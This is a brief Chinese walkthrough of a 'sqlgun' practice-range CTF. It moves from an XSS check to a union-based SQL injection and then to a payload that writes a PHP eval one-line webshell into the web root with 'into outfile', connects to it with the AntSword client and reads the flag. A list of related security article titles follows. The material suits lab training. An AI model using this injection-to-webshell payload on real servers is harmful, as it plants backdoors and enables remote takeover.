sqlgun靶场练习

1.打开网站看到有输入框,先测试以下有没有xss,能弹窗,说明存在xss漏洞

2.有xss大概率也存在sql注入,测试到3的时候发现有回显

3.进一步得出库名

4.要get shell的话我们可以尝试写一句话木马进去,构建payload

key=-1' union select 1,"<?php @eval($_POST[cmd]); ?>", 3 into outfile '/var/www/html/1.php'#

5.访问我们写进去的1.php,确认木马已写入

6.打开蚁剑连接

7.在根目录下得到flag

相关推荐
weixin_472339462 小时前
网络安全之XSS漏洞:原理、危害与防御实践
安全·web安全·xss
Par@ish9 小时前
【网络安全】恶意 Python 包“psslib”仿冒 passlib,可导致 Windows 系统关闭
windows·python·web安全
花木偶1 天前
【郑大二年级信安小学期】Day6:CTF密码学&杂项&工具包
安全·web安全·密码学
黑客老李1 天前
EDUSRC:智慧校园通用漏洞挖掘(涉校园解决方案商)
服务器·前端·网络·安全·web安全
薄荷椰果抹茶1 天前
【网络安全基础】第七章---无线网络安全
网络·安全·web安全
weixin_472339461 天前
网络安全之重放攻击:原理、危害与防御之道
安全·web安全
咖啡啡不加糖1 天前
暴力破解漏洞与命令执行漏洞
java·后端·web安全
weixin_472339461 天前
网络安全之注入攻击:原理、危害与防御之道
安全·web安全
安全系统学习1 天前
网络安全之漏洞学习
前端·安全·web安全·网络安全·xss
码农12138号2 天前
BUUCTF在线评测-练习场-WebCTF习题[GXYCTF2019]BabyUpload1-flag获取、解析
web安全·网络安全·文件上传漏洞·buuctf·解析漏洞